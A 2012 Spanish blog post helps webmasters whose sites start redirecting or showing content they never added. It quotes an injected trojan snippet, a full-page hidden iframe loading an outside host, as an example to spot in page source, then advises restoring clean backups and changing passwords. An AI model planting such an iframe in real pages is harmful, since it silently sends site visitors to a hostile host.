sábado, 30 de junio de 2012

Mi siito iba bien pero ahora pasan cosas muy raras

Bueno, la primera cosa es hacer un ejercicio de auto-examen, auto-mega-sinceridad y buen rollo interior para que quede claro (para uno mismo) si he cambiado, he jugado, he probado o he toqueteado el código o los archivos de mi sitio web. Creedme, una buena parte de los problemas en sitios que iban bien y ahora no los tiene el propio webmaster.

Pero también puede suceder que, efectivamente, algo de repente vaya mal. Por ejemplo, mi sitio ha comenzado a redirigir a otro o aparecen cosas nuevas en mi sitio que yo no puse.

Os aconsejo probar vuestro sitio con diferentes navegadores (tened siempre Chrome y/o Opera a mano). Y mirad en cada uno de ellos el código fuente de vuestra página que funciona mal.

Por ejemplo, podreis encontraros algo así:

<iframe name="rotater"\nWidth="100%"\nheight="100%"\nframeborder="0"\nsrc="http://xlphp.net/blog2/"\nmarginwidth="0"\nmarginheight="0"\nvspace="0"\nhspace="0"\nallowtransparency="true"\nscrolling="auto">\n</iframe>\n<!-- 399 310 772 188 121 747 908 375 658 989 471 891 842 282 539 788 863 399 310 772 188 121 747 908 375 658 989 471 891 842 282 539 788 863 399 310 772 188 121 747 908 375 658 989 471 891 842 282 539 788 863 526 640 917 51 415 140 573 716 965 688 395 829 76 810 801 733 244 95 205 283 488 189 705 173 743 574 947 608 694 973 886 298 223 449 99 309 936 432 209 623 454 ph-->

Eso es un troyano. Un trozo de código inyectado a vuestro sitio. Sucede más a menudo de lo que pensais mayormente por sitios web que utilizan scripts vulnerables o trozos de código php o javascript que actúan de esa manera.

Tanto si has sido tú jugando con tu sitio o se te ha colado un troyano...

Debes tener siempre una copia limpia de tu sitio. O sea, guarda una copia de los archivos que usaste al empezar tu web y que sí funcionaban bien. Borra todos los archivos de tu web y vuelve a subir la copia limpia.

Si no tienes una copia limpia de tu sitio entonces te toca averiguar lo que está mal.

No olvides cambiar las contraseñas. Muchos troyanos hacen más cosas que la puñeta visual.

Si utilizas un script de un tercero ten mucho cuidado. Muchas copias para descargar ya pueden contener troyanos o puertas traseras, especialmente copias piratas de scripts de pago. Cualquier script puede tener vulnerabilidades que son aprovechadas por spiders para inyectar código malicioso en inocentes webs.

En fin, la recomendación es: en caso de duda, borra y empieza de nuevo. Si tu sitio funcionaba bien hasta que de repente ya no va bien... usa la filosofía del backup... vuelve atrás en el tiempo.
Publicado por en
Etiquetas: ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)